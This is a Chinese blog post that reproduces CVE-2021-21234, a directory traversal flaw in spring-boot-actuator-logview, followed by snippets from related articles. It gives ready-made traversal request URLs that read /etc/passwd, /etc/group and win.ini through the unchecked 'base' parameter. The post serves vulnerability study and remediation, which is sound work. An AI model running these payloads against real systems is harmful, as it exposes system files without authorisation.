Spring Boot 目录遍历 (CVE-2021_21234)

最新推荐文章于 2025-06-29 03:24:54 发布
最新推荐文章于 2025-06-29 03:24:54 发布
阅读量5.2k 收藏 5
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞 文章标签: spring boot java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/122250864

Spring Boot 目录遍历 (CVE-2021_21234)

漏洞简介:

spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。它是 maven 包“eu.hinsch:spring-boot-actuator-logview”。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。该库的本质是通过 admin(spring boot 执行器)HTTP 端点公开日志文件目录。要查看的文件名和基本文件夹(相对于日志文件夹根)都可以通过请求参数指定。虽然检查了文件名参数以防止目录遍历攻击(因此filename=../somefile 将不起作用),但没有充分检查基本文件夹参数,因此filename=somefile&base=../ 可以访问日志记录基目录之外的文件)。该漏洞已在 0.2.13 版中修复。0.2.12 的任何用户都应该能够毫无问题地进行更新,因为该版本中没有其他更改。除了更新或删除依赖项之外,没有解决此漏洞的方法。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。此外,可以通过在反向代理后面部署应用程序来限制对 logview 端点的访问。

影响范围:

0.2.13版本之前

环境搭建 地址

漏洞复现:

访问首页

构造poc,view函数对filename参数进行合法性校验,但是没有对base参数进行合法性校验。
 

"{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # Windows

"{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" # windows

"{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux

"{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" # linux

这里采用linux的第一种,得到回显 

漏洞修复:

根据官方,升级到最新版

Spring Framework 路径遍历漏洞复现(CVE-2024-38819)
iSee857的博客
12-16 2986
Spring Framework 存在路径遍历漏洞,当应用程序使用WebMvc.fn 或 WebFlux.fn 提供静态资源时,恶意攻击者通过编写特殊HTTP请求并获取目标系统上任何由Spring应用程序正在运行的进程访问的文件,从而导致信息泄露。
springboot 修复 Spring Framework 特定条件下目录遍历漏洞(CVE-2024-38816)
记录点滴
10-14 9963
springboot2.x升级到3.x实战经验总结安全版本6.0.24 和 6.1.13springboot3.x使用的版本,springboot3.x的用户只需要将springboot升级到最新版本即可,官方已发布最新版本,如下图所示,springboot3.2以下版本已不再提供更新维护。祝大家升级顺利!
Spring-Boot Actuator-logview 文件包含漏洞(CVE-2021-21234)分析
ML_Team的博客
10-29 7633
0x01 前言 首先声明一下CVE-2021-21234是属于文件包含漏洞,却被很多人起标题写成文件上传、文件、任意文件上传等等。起初看到这些标题的时候都给我整的一愣一愣的,到底是文件包含还是任意文件下载,还是文件上传。很凑巧,近期有Spring-Boot目标需要进行测试,因此做好记录。 0x02 漏洞分析 Actuator-logview是Spring Boot中的类似插件的库,此库的维护已经没有很久没有更新,而Actuator-logview中存在一个简单的日志文件查看器的功能,其端点路径为/
Spring Boot 目录遍历CVE-2021-21234
qq_23003811的博客
07-19 1455
Spring Boot 虽然检查了文件名参数以防止目录遍历攻击(因此。将不起作用),但没有充分检查基本文件夹参数,因此。可以访问日志记录目录之外的文件)。
[复现] CVE-2025-33053
最新发布
安全小白,希望我的文章对你有所帮助。
06-29 1189
本地复现CVE-2025-33053
Spring Boot 目录遍历CVE-2021-21234
m0_65150886的博客
01-02 2183
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历。1.spring-boot-actuator-logview 升级到0.2.13版本。
CVE-2021-21234 spring-boot-actuator-logview目录遍历漏洞
mirocky的博客
10-26 838
源码中对filename进行了校验但并未对路径进行校验。送入repeater打入payload,复现成功。首先开vulhub的镜像。点击下载,原数据包如下。
Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)
weixin_74985952的博客
09-26 792
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历
目录遍历Spring Boot 目录遍历CVE-2021-21234
wj33333的博客
11-17 809
spring-boot-actuator-logview 在一个库中添加了一个简单的日志文件查看器作为 spring boot 执行器端点。在 0.2.13 版本之前的 spring-boot-actuator-logview 中存在目录遍历漏洞。虽然检查了文件名参数以防止目录遍历攻击(因此`filename=../somefile` 将不起作用),但没有充分检查基本文件夹参数,因此`filename=somefile&base=../` 可以访问日志记录基目录之外的文件)。
springboot 任意文件下载漏洞 CVE-2021-21234
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
08-02 7288
文章目录复现修复 复现 项目地址:https://github.com/cristianeph/vulnerability-actuator-log-viewer 下载后使用IDEA打开工程,该漏洞是由spring-boot-actuator-logview 0.2.13之前的版本导致的。 运行项目,打开网址 poc如下: http://localhost:8887/manage/log/view?filename=/etc/group&base=../../../../../../../../
漏洞分析 | Spring Framework路径遍历漏洞(CVE-2024-38816)
WangsuSecurity的博客
11-07 6054
当同时满足使用 RouterFunctions 和 FileSystemResource 来处理和提供静态文件时,攻击者可构造恶意请求遍历读取系统上的文件
spring-boot-actuator-logview 文件包含(CVE-2021-21234)漏洞分析
weixin_50464560的博客
10-04 1151
前言 日常搬砖过程中在github发现的一个CVE,https://github.com/ARPSyndicate/kenzer-templates/blob/1f1dd550ddbde72cbe378452973b93b3e62003f5/jaeles/cvescan/medium/CVE-2021-21234.yam 看着带了springboot就分析了下 环境搭建 git clone https://github.com/cristianeph/vulnerabi...
springboot任意文件读取 CVE-2021-21234
weixin_43165012的博客
11-04 3480
一、简介 spring-boot-actuator-logview是简单的日志文件查看器作为 SpringBoot 执行器端,允许快速访问 spring-boot web 应用程序日志文件。 二、漏洞复现 项目地址: 链接: https://pan.baidu.com/s/1lm4AZfvLlP-x0GfrdMBKeA 提取码: juq3 下载该项目,并使用idea运行该项目。 打开网页便能查看日志情况 该漏洞存在LogViewEndpoint中, 只对filename进行了..
学好Python开发你一定会用到这30框架种
轻松学python的博客
11-07 1123
现在Python成为了炽手可热的一门语言,在如何快速入门的同时,如何进行高效的开发是一门语言非常重要的优势。我们收集马哥Python了超过2000名学员的意见和建议,对Python常用的框架进行了梳理,这些框架包括事件I/O,OLAP,Web开发,高性能网络通信,测试,爬虫等。 Python目前主流的应用包括:Web开发、图形界面开发、系统网络运维、网络编程、科学数字计算、3D游戏开发,而我...
【vulfocus漏洞复现】Spring bootCVE-2021_21234)
一剑开天门!的博客
03-02 5783
【vulfocus漏洞复现】Spring bootCVE-2021_21234)
Spring Boot存在路径遍历漏洞CVE-2021-22118
日拱一卒无有尽,功不唐捐终入海
08-28 1777
背景:Spring Boot存在路径遍历漏洞。官方 issue也有对此的记录,感兴趣可以看下CVE-2021-22118 是一个在 Spring Boot 中发现的漏洞。该漏洞关系到 Spring Boot 的开发者工具(Devtools)中的远程更新(Remote Update)功能。在某些情况下,攻击者可能会利用这个功能进行目录遍历攻击,从而访问到系统中的敏感文件。远程更新功能被开启(spring.devtools.restart.enabled = true)。
【漏洞复现-spring-目录遍历】vulfocus/spring-cve_2020_5410
10-15 1607
spring-目录遍历
Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework
BearFinn的博客
04-24 3444
Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework 官方给出的描述是Spring框架中报告了一个与静态资源处理相关的目录遍历漏洞。某些URL在使用前未正确加密,使得攻击者能够获取文件系统上的任何文件,这些文件也可用于运行SpringWeb应用程序的进程。 受影响的版本: Spring Framework 3.0.4 to 3.2.11...
jar包漏洞
03-28
### 关于Jar包漏洞及其修复方案 对于 Jar 包相关的漏洞,通常可以通过其对应的框架或库的官方公告以及 CVE 数据库来了解具体的漏洞详情和修复建议。以下是针对几个常见框架(MyBatis、Log4j 和 Spring Boot)中的漏洞描述及修复方案: #### MyBatis 漏洞 (CVE-2020-26945) MyBatis 的 CVE-2020-26945 漏洞影响了版本低于 3.5.6 的用户。此漏洞可能导致安全风险,因此推荐受影响用户尽快升级至最新稳定版以获得修补支持[^1]。 ```java // 升级依赖示例 <dependency> <groupId>org.mybatis</groupId> <artifactId>mybatis</artifactId> <version>3.5.6</version> <!-- 或更高 --> </dependency> ``` #### Log4j 漏洞 (CVE-2021-44832) Log4j 的 CVE-2021-44832 是一种远程代码执行(RCE)漏洞,在特定情况下允许攻击者通过 JDBC 追加器发起攻击。解决办法是更新到以下版本之一: - Java 8 用户应使用 Log4j 2.17.1; - Java 7 用户应使用 Log4j 2.12.4; - Java 6 用户则需采用 Log4j 2.3.2[^2]。 ```xml <!-- Maven 配置示例 --> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</artifactId> <version>2.17.1</version> <!-- 根据环境调整 --> </dependency> ``` #### Spring Boot 漏洞 (CVE-2024-38819) Spring Boot 中发现了一个新的目录遍历漏洞(CVE-2024-38819),它可能被利用访问受限文件资源。为了防止此类威胁,开发者应当将项目所使用的 Spring Boot 更新至至少 3.3.5 版本[^3]。 ```properties # Gradle 构建脚本片段 implementation &#39;org.springframework.boot:spring-boot-starter:3.3.5&#39; ``` --- ### 总结 上述提到的不同 jar 包存在各自的安全隐患,但均提供了明确的修复路径——即及时迁移到官方发布的安全性增强版本上。这不仅有助于消除当前已知的风险点,还能享受未来持续改进带来的益处。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值